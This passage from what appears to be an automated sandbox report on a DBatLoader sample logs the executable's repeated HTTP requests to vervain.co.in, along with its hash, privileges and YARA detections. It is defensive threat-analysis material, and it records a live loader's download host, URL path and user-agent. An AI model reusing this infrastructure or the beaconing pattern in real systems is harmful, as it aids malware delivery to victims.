                2022-08-05 13:10:15 UTC | 77 | IN | Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                81 | 192.168.2.4 | 49859 | 199.79.62.221 | 443 | C:\Users\user\Desktop\ncIpox4w8f.exe
                Timestamp | kBytes transferred | Direction | Data
                2022-08-05 13:10:16 UTC | 78 | OUT | GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:10:16 UTC | 78 | IN | HTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:10:16 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                2022-08-05 13:10:16 UTC | 78 | IN | Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                82 | 192.168.2.4 | 49860 | 199.79.62.221 | 443 | C:\Users\user\Desktop\ncIpox4w8f.exe
                Timestamp | kBytes transferred | Direction | Data
                2022-08-05 13:10:17 UTC | 79 | OUT | GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:10:17 UTC | 79 | IN | HTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:10:17 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                2022-08-05 13:10:17 UTC | 79 | IN | Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                83 | 192.168.2.4 | 49861 | 199.79.62.221 | 443 | C:\Users\user\Desktop\ncIpox4w8f.exe
                Timestamp | kBytes transferred | Direction | Data
                2022-08-05 13:10:18 UTC | 80 | OUT | GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:10:18 UTC | 80 | IN | HTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:10:18 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                2022-08-05 13:10:18 UTC | 80 | IN | Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                84 | 192.168.2.4 | 49863 | 199.79.62.221 | 443 | C:\Users\user\Desktop\ncIpox4w8f.exe
                Timestamp | kBytes transferred | Direction | Data
                2022-08-05 13:10:19 UTC | 81 | OUT | GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:10:20 UTC | 81 | IN | HTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:10:20 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                2022-08-05 13:10:20 UTC | 81 | IN | Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                85 | 192.168.2.4 | 49864 | 199.79.62.221 | 443 | C:\Users\user\Desktop\ncIpox4w8f.exe
                Timestamp | kBytes transferred | Direction | Data
                2022-08-05 13:10:20 UTC | 82 | OUT | GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:10:21 UTC | 82 | IN | HTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:10:20 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                2022-08-05 13:10:21 UTC | 82 | IN | Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                86 | 192.168.2.4 | 49867 | 199.79.62.221 | 443 | C:\Users\user\Desktop\ncIpox4w8f.exe
                Timestamp | kBytes transferred | Direction | Data
                2022-08-05 13:10:21 UTC | 82 | OUT | GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:10:22 UTC | 83 | IN | HTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:10:22 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                2022-08-05 13:10:22 UTC | 83 | IN | Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                9 | 192.168.2.4 | 49764 | 199.79.62.221 | 443 | C:\Users\user\Desktop\ncIpox4w8f.exe
                Timestamp | kBytes transferred | Direction | Data
                2022-08-05 13:08:33 UTC | 8 | OUT | GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:08:34 UTC | 8 | IN | HTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:08:33 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                2022-08-05 13:08:34 UTC | 9 | IN | Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                No statistics
                Target ID: 0
                Start time: 15:08:18
                Start date: 05/08/2022
                Path: C:\Users\user\Desktop\ncIpox4w8f.exe
                Wow64 process (32bit): true
                Commandline: "C:\Users\user\Desktop\ncIpox4w8f.exe"
                Imagebase: 0x400000
                File size: 1009664 bytes
                MD5 hash: 03FB0F9DF279B56130A63D5330461789
                Has elevated privileges: true
                Has administrator privileges: true
                Programmed in: Borland Delphi
                Yara matches:
                • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000000.238770915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000002.528757099.0000000002AC0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000003.316597179.000000000540C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000003.297908164.0000000005536000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000003.388263630.000000000571D000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000003.267479672.0000000005250000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000003.280613950.0000000005258000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000003.325641220.000000000532C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000003.370720405.0000000005803000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000003.304401425.000000000532F000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000003.266317297.0000000005450000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000003.272943807.0000000004942000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000003.371769839.00000000058FA000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000002.516088512.0000000002290000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000003.377241970.0000000005825000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000003.345105866.00000000054B9000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000003.286610095.0000000005061000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000003.284258980.0000000004F55000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000003.309310644.0000000005330000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                Reputation: low

                No disassembly